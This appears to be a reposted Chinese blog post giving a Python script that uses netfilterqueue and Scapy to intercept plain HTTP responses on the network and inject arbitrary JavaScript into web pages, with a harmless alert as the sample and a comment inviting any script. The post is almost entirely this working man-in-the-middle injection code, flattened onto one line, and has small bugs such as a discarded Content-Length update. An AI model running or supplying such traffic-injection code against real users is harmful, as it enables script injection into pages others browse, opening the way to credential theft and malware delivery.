利用Python Netfilter與Scapy向網頁中插入Javascript程式碼
阿新 • • 發佈:2022-04-01
import netfilterqueue from scapy.all import * import re def modify_payload(scapy_packet,load_change): scapy_packet[Raw].load = load_change.encode('utf-8') del scapy_packet[IP].len del scapy_packet[IP].chksum del scapy_packet[TCP].chksum return scapy_packet def packet_handler(pkt):#Convert pkt to packet in the format of scapy to process and analyze scapy_packet = IP(pkt.get_payload()) if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP): if scapy_packet[TCP].dport == 80: print("This is Request.................") # print(scapy_packet.show())elif scapy_packet[TCP].sport == 80: load = scapy_packet[Raw].load.decode('utf-8') java_script = '<script>alert("hi, jason")</script>' #插入任何Javascript程式碼 modified_load = load.replace("</table>", java_script+"</table>") #選擇Javascript程式碼插入的地方,比如</body>前面,但是我測試的這個網站比較奇葩,沒有</body>標籤 content_length_search = re.search(r'(?:Content-Length:\s)(\d*)', load) #對於有Content-lengh欄位的響應報文需要修改(並不是所有返回的響應報文都有這個欄位) if content_length_search and 'text/html': content_length = content_length_search.group(1) print("Length of content is : %s" % content_length) new_content_length = int(content_length)+len(java_script) modified_load.replace(content_length, str(new_content_length)) scapy_packet = modify_payload(scapy_packet, modified_load) pkt.set_payload(bytes(scapy_packet)) pkt.accept() queue = netfilterqueue.NetfilterQueue() queue.bind(0, packet_handler) queue.run()